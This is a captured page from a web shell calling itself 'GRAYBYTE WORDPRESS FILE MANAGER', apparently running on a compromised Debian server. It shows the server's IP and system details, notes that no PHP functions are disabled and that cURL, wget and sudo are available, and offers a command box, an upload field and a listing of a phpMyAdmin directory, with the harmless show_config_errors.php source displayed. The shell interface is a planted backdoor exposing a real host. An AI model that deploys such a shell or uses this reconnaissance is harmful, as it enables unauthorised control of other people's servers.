GRAYBYTE WORDPRESS FILE MANAGER4727

Server IP : 3.104.188.249 / Your IP : 216.73.217.141
System : Linux ip-172-26-1-242 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
PHP Version : 8.3.31
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : ON | Pkexec : OFF
Directory : /usr/share/phpmyadmin/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /usr/share/phpmyadmin//show_config_errors.php
<?php
/**
 * Simple wrapper just to enable error reporting and include config
 */

declare(strict_types=1);

if (! defined('ROOT_PATH')) {
    // phpcs:disable PSR1.Files.SideEffects
    define('ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR);
    // phpcs:enable
}

// rfc2616 - Section 14.21
header('Expires: ' . gmdate(DATE_RFC1123));
// HTTP/1.1
header('Cache-Control: no-store, no-cache, must-revalidate,  pre-check=0, post-check=0, max-age=0');

header('Pragma: no-cache'); // HTTP/1.0
// test case: exporting a database into a .gz file with Safari
// would produce files not having the current time
// (added this header for Safari but should not harm other browsers)
header('Last-Modified: ' . gmdate(DATE_RFC1123));

header('Content-Type: text/html; charset=utf-8');

// phpcs:disable PSR1.Files.SideEffects
define('PHPMYADMIN', true);
// phpcs:enable

require ROOT_PATH . 'libraries/constants.php';

// issue #16256 - This only works with php 8.0+
if (function_exists('error_reporting')) {
    error_reporting(E_ALL);
}

/**
 * Read config file.
 */
if (is_readable(CONFIG_FILE)) {
    /** @psalm-suppress MissingFile */
    include CONFIG_FILE;
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
June 03 2026 04:31:25
root / root
0755
doc
--
May 27 2026 03:19:02
root / root
0755
js
--
May 27 2026 03:19:02
root / root
0755
libraries
--
May 27 2026 03:19:02
root / root
0755
locale
--
May 27 2026 03:19:01
root / root
0755
sql
--
May 27 2026 03:19:02
root / root
0755
templates
--
May 27 2026 03:19:02
root / root
0755
themes
--
May 27 2026 03:19:02
root / root
0755
autoload.php
76.252 KB
April 08 2025 15:25:51
root / root
0644
config.sample.inc.php
4.697 KB
February 07 2023 21:35:11
root / root
0644
favicon.ico
21.959 KB
February 07 2023 21:35:11
root / root
0644
index.php
1.049 KB
February 07 2023 21:35:11
root / root
0644
robots.txt
0.025 KB
February 07 2023 21:35:11
root / root
0644
show_config_errors.php
1.126 KB
February 07 2023 21:35:11
root / root
0644
url.php
0.942 KB
February 07 2023 21:35:11
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF